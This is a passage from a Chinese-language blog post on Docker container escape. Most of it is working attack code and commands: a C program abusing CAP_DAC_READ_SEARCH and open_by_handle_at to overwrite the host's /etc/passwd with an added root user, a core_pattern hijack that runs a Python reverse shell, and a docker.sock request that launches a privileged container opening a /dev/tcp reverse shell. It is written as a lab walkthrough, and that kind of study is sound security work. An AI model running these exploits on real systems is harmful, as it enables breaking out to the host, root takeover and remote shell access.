class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  closedir(dir);</span><br><span class="line">  close(fd);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> * argv[])</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (argc!=<span class="number">3</span>)&#123;</span><br><span class="line">        die(<span class="string">&quot;Usage:./write outside_file inside_file&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">int</span> fd1;</span><br><span class="line">    <span class="comment">// get a FS reference from something mounted in from outside</span></span><br><span class="line">    <span class="keyword">if</span> ((fd1 = open(<span class="string">&quot;/etc/hostname&quot;</span>, O_RDONLY)) &lt; <span class="number">0</span>)</span><br><span class="line">    die(<span class="string">&quot;[-] open&quot;</span>);</span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">h</span>;</span></span><br><span class="line">  <span class="class"><span class="keyword">struct</span> <span class="title">my_file_handle</span> <span class="title">root_h</span> =</span> &#123;</span><br><span class="line">    .handle_bytes = <span class="number">8</span>,</span><br><span class="line">    .handle_type = <span class="number">1</span>,</span><br><span class="line">    .f_handle = &#123;</span><br><span class="line">      <span class="number">0x02</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      <span class="number">0</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;;</span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (find_handle(fd1, argv[<span class="number">1</span>], &amp; root_h, &amp; h) &lt;= <span class="number">0</span>)</span><br><span class="line">    die(<span class="string">&quot;[-] Cannot find valid handle!&quot;</span>);</span><br><span class="line"></span><br><span class="line">  dump_handle( &amp; h);</span><br><span class="line">    <span class="type">int</span> fd2;</span><br><span class="line">  <span class="keyword">if</span> ((fd2 = open_by_handle_at(fd1, (<span class="keyword">struct</span> file_handle * ) &amp; h, O_RDWR)) &lt; <span class="number">0</span>)</span><br><span class="line">    die(<span class="string">&quot;[-] open_by_handle&quot;</span>);</span><br><span class="line">  <span class="type">char</span> * line = <span class="literal">NULL</span>;</span><br><span class="line">  <span class="type">size_t</span> len = <span class="number">0</span>;</span><br><span class="line">  <span class="type">ssize_t</span> read;</span><br><span class="line">  FILE *  fptr = fopen(argv[<span class="number">2</span>], <span class="string">&quot;r&quot;</span>);</span><br><span class="line">  <span class="keyword">while</span> ((read = getline( &amp; line, &amp; len, fptr)) != <span class="number">-1</span>) &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%p&quot;</span>,line);</span><br><span class="line">    write(fd2, line, read);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Success!!\n&quot;</span>);</span><br><span class="line">  close(fd2);</span><br><span class="line">  close(fd1);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo <span class="string">&#x27;test:$6$7p31yPiD$xLKWF5uIeS6oibSO2nwDlSQEjrzgPEFcRkSVTCEaeoxibJnXjC5NOmTVC/dLvuSHBrVt8tknWaPZ/65PECL0C1:0:0::/root:/bin/sh&#x27;</span>&gt;&gt;passwd</span><br><span class="line">./write /etc/passwd passwd</span><br></pre></td></tr></table></figure>
<p>可以发现宿主机的&#x2F;etc&#x2F;passwd被我们覆盖了<br>然后ssh登陆宿主机,密码是123456</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><h4 id="Q1-为什么docker-mount-etc-resolv-conf-hostname-hosts"><a href="#Q1-为什么docker-mount-etc-resolv-conf-hostname-hosts" class="headerlink" title="Q1  为什么docker mount &#x2F;etc&#x2F;{resolv.conf,hostname,hosts}"></a>Q1  为什么docker mount &#x2F;etc&#x2F;{resolv.conf,hostname,hosts}</h4><p><a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/56578998/what-is-the-meaning-of-mounting-dev-sda1-to-etc-hosts-in-docker-container">https://stackoverflow.com/questions/56578998/what-is-the-meaning-of-mounting-dev-sda1-to-etc-hosts-in-docker-container</a><br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684122606601-e8538bb4-f071-46f7-ae87-46b292b843a2.png#clientId=u4062fab9-acd5-4&from=drop&id=u8b9f92ca&originHeight=304&originWidth=3048&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1094641&status=done&style=none&taskId=u6d4cce36-88e6-4c78-ae9a-79328aa7688&title=" alt="截屏2023-05-15 11.50.00.png"><br>Bind-mount 保证在容器设置期间不会修改卷上的文件，也不会传播到其他容器,这三个文件可能经常配置，他就这样设计了，我暂时也没有更好的解释，可能需要从开发的角度来说</p>
<h4 id="CAP-DAC-READ-SEARCH"><a href="#CAP-DAC-READ-SEARCH" class="headerlink" title="CAP_DAC_READ_SEARCH"></a>CAP_DAC_READ_SEARCH</h4><p>CAP_DAC_READ_SEARCH是一个危险的权限</p>
<ul>
<li>Bypass file read permission checks and directory read and<br>execute permission checks;open_by_handle_at</li>
<li>not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to open_by_handle_at and could allow our process to sensitive files opened by other processes.</li>
</ul>
<h1 id="挂载不当"><a href="#挂载不当" class="headerlink" title="挂载不当"></a>挂载不当</h1><h2 id="procfs"><a href="#procfs" class="headerlink" title="procfs"></a>procfs</h2><p>procfs是一个伪文件系统，它动态反映着系统内进程及其他组件的状态，其中有许多非常敏感，重要的文件。因为，将宿主机的procfs挂载到不受控的容器也是十分危险的，尤其是在该容器默认启用root权限，且没有开启User Namespace时<br>procfs中的&#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern负责配置进程崩溃时内存转储数据的导出方式。<br><em>从2.6.19内核版本开始，linux支持在&#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;core_pattern中使用新语法。如果该文件中的首个字符是管道符(|),那么该行的剩余内容将被当作用户空间程序或脚本解析并执行</em><br>上述描述的新功能原本是为了方便用户获得并处理内存转储数据，然而，他提供命令执行能力作为后门的这种思路十分巧妙，具有一定的隐蔽性。</p>
<h3 id="实验环境配置"><a href="#实验环境配置" class="headerlink" title="实验环境配置"></a>实验环境配置</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /proc/:/host/proc/ ubuntu:<span class="number">18.04</span> bash</span><br></pre></td></tr></table></figure>
<h3 id="实际利用"><a href="#实际利用" class="headerlink" title="实际利用"></a>实际利用</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name core_pattern <span class="number">2</span>&gt;/dev/null | wc -l | grep -q <span class="number">2</span> &amp;&amp; echo <span class="string">&quot;Procfs is mounted.&quot;</span> || echo <span class="string">&quot;Procfs is not mounted.&quot;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483016363-e3a5c278-ec5a-4b12-bb55-0fe75f7714b8.png#clientId=ua0af21ff-e113-4&from=drop&id=u399e5c65&originHeight=116&originWidth=2858&originalType=binary&ratio=2&rotation=0&showTitle=false&size=372576&status=done&style=none&taskId=ub351a274-9d07-4ddd-94b7-3c3941db12c&title=" alt="截屏2023-05-19 15.56.49.png"><br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483038894-b6dad13f-44b1-418f-b5a7-9a08fbdefa49.png#clientId=ua0af21ff-e113-4&from=drop&id=obrUX&originHeight=148&originWidth=1200&originalType=binary&ratio=2&rotation=0&showTitle=false&size=218242&status=done&style=none&taskId=ua020c68a-5f64-4e5c-805e-f51ebfe73dd&title=" alt="截屏2023-05-19 15.57.14.png"><br>由于挂载的原因，我们修改了core_pattern也会影响宿主机的core_pattern<br>获取容器在宿主机的路径</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /proc/<span class="number">1</span>/mountinfo|grep overlay</span><br></pre></td></tr></table></figure>
<p><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483158651-48033beb-3dae-463f-a89b-1e9197fe3721.png#clientId=ua0af21ff-e113-4&from=drop&id=ue5541068&originHeight=184&originWidth=3790&originalType=binary&ratio=2&rotation=0&showTitle=false&size=756865&status=done&style=none&taskId=u06804003-6678-41ba-a7cf-d5346899794&title=" alt="截屏2023-05-19 15.59.13.png"><br>这里就是</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/lib/docker/overlay2/b2e03c5ab8daa7792345fd5499a54612c49b2323ec08f4011ba78c7226fa052f/merged</span><br></pre></td></tr></table></figure>
<p>然后在&#x2F;tmp目录下编写一个反弹shell的python脚本,别忘记赋予执行权限</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python3</span><br><span class="line">import os</span><br><span class="line">import pty</span><br><span class="line">import socket</span><br><span class="line"></span><br><span class="line">lhost = <span class="string">&quot;172.17.0.1&quot;</span> # 根据实际情况修改</span><br><span class="line">lport = <span class="number">10000</span> # 根据实际情况修改</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s.connect((lhost, lport))</span><br><span class="line">    os.dup2(s.fileno(), <span class="number">0</span>)</span><br><span class="line">    os.dup2(s.fileno(), <span class="number">1</span>)</span><br><span class="line">    os.dup2(s.fileno(), <span class="number">2</span>)</span><br><span class="line">    os.putenv(<span class="string">&quot;HISTFILE&quot;</span>, <span class="string">&#x27;/dev/null&#x27;</span>)#HISTFILE这个环境变量指示出你的运行环境中保存命令历史的文件,这里可以帮我们隐藏</span><br><span class="line">    pty.spawn(<span class="string">&quot;/bin/bash&quot;</span>)</span><br><span class="line">    s.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>修改core_pattern</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo -e <span class="string">&quot;|/var/lib/docker/overlay2/b2e03c5ab8daa7792345fd5499a54612c49b2323ec08f4011ba78c7226fa052f/merged/tmp/.x.py &quot;</span> &gt;  /host/proc/sys/kernel/core_pattern</span><br></pre></td></tr></table></figure>
<p>接下来编写一个触发异常的c代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int</span> *a = <span class="literal">NULL</span>;</span><br><span class="line">    *a = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先监听shell的回连端口，然后编译并执行<br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483484245-a9534144-ebd2-47ec-8583-c381f3edecf7.png#clientId=ua0af21ff-e113-4&from=drop&id=ub92e3871&originHeight=150&originWidth=798&originalType=binary&ratio=2&rotation=0&showTitle=false&size=156280&status=done&style=none&taskId=uda9b80be-6ea7-4047-8a0c-57b8126bc69&title=" alt="截屏2023-05-19 16.04.38.png"><br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684483499278-e02c1b29-4485-4458-9b0d-2051b92aadf1.png#clientId=ua0af21ff-e113-4&from=drop&id=u04d3e4eb&originHeight=1094&originWidth=1764&originalType=binary&ratio=2&rotation=0&showTitle=false&size=2135400&status=done&style=none&taskId=u97be1bec-1a9d-4390-bed9-fec5ee95868&title=" alt="截屏2023-05-19 16.04.55.png"></p>
<h2 id="docker-socket"><a href="#docker-socket" class="headerlink" title="docker socket"></a>docker socket</h2><h3 id="实验环境配置-1"><a href="#实验环境配置-1" class="headerlink" title="实验环境配置"></a>实验环境配置</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:<span class="number">18.04</span> bash </span><br></pre></td></tr></table></figure>
<h3 id="实际利用-1"><a href="#实际利用-1" class="headerlink" title="实际利用"></a>实际利用</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name docker.sock <span class="number">2</span>&gt;/dev/null | wc -l | grep -q -v <span class="number">0</span>  &amp;&amp; echo <span class="string">&quot;Docker socket is mounted&quot;</span> ||echo <span class="string">&quot;Docker socket is not mounted&quot;</span></span><br></pre></td></tr></table></figure>
<p>查看挂载了docker.sock<br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484620778-eadc0a59-4724-4a03-957d-2a280760b622.png#clientId=ua0af21ff-e113-4&from=drop&id=Zeaa4&originHeight=176&originWidth=3138&originalType=binary&ratio=2&rotation=0&showTitle=false&size=565797&status=done&style=none&taskId=u97db489d-b514-44d1-81e8-9695a6518b6&title=" alt="截屏2023-05-19 16.23.35.png"><br>获取可以用的镜像</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --unix-socket /run/docker.sock http:<span class="comment">//localhost/images/json</span></span><br></pre></td></tr></table></figure>
<p><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484796871-a990cdef-aa61-4e8e-b62a-57db922ccfb3.png#clientId=ua0af21ff-e113-4&from=drop&id=tCa8n&originHeight=226&originWidth=3840&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1047128&status=done&style=none&taskId=ue944eb57-fc46-4048-8abe-60a02a2eb41&title=" alt="截屏2023-05-19 16.26.27.png"><br>创建特权容器并且反弹shell</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST -H <span class="string">&quot;Content-Type: application/json&quot;</span> -d <span class="string">&quot;&#123;</span></span><br><span class="line"><span class="string">     \&quot;Image\&quot;: \&quot;ubuntu:18.04\&quot;,</span></span><br><span class="line"><span class="string">     \&quot;HostConfig\&quot;: &#123;</span></span><br><span class="line"><span class="string">         \&quot;Privileged\&quot;: true</span></span><br><span class="line"><span class="string">     &#125;,</span></span><br><span class="line"><span class="string">   \&quot;Cmd\&quot;:[</span></span><br><span class="line"><span class="string">                 \&quot;bash\&quot;,\&quot;-c\&quot;,\&quot;bash -i &gt;&amp; /dev/tcp/172.17.0.1/10001  0&gt;&amp;1\&quot;</span></span><br><span class="line"><span class="string">             ]</span></span><br><span class="line"><span class="string"> &#125;&quot;</span> --unix-socket /run/docker.sock http:<span class="comment">//localhost/containers/create</span></span><br></pre></td></tr></table></figure>
<p>返回一个id<br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484891297-032500cc-e095-48a5-b4be-f621a6a7c7c5.png#clientId=ua0af21ff-e113-4&from=drop&id=u29c0cebb&originHeight=410&originWidth=1874&originalType=binary&ratio=2&rotation=0&showTitle=false&size=845442&status=done&style=none&taskId=u3abd8121-11d1-4319-bf9d-8dfea71ef4f&title=" alt="截屏2023-05-19 16.28.07.png"><br>监听端口，并且启动容器</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST  --unix-socket /run/docker.sock http:<span class="comment">//localhost/containers/c083f630d5828591bba03b48f2193422f4e661149689d1cd9c12b2637e7450cd/start  </span></span><br></pre></td></tr></table></figure>
<p>反弹了shell并且是特权容器<br><img src="https://intranetproxy.alipay.com/skylark/lark/0/2023/png/64756506/1684484967342-cb2123de-8f55-4792-85e3-34cba17f3bfd.png#clientId=ua0af21ff-e113-4&from=drop&id=u4d17c29f&originHeight=1168&originWidth=1388&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1596699&status=done&style=none&taskId=uca5de9c8-2e0c-4f9c-a3b0-e52eb84afb8&title=" alt="截屏2023-05-19 16.29.22.png"></p>
<h2 id="shared-network-namespace"><a href="#shared-network-namespace" class="headerlink" title="shared network namespace"></a>shared network namespace</h2><p>一般来说，如果不能通过上述方法逃逸，那么可以先收集敏感信息，然后横向移动</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/11/15/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/" data-id="clozcjs7n0001ce6scnisfrd0" data-title="容器逃逸 All in One" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/index.html" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Welcome</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">November 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/11/15/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/">容器逃逸 All in One</a>
          </li>
        
          <li>
            <a href="/index.html">Welcome</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>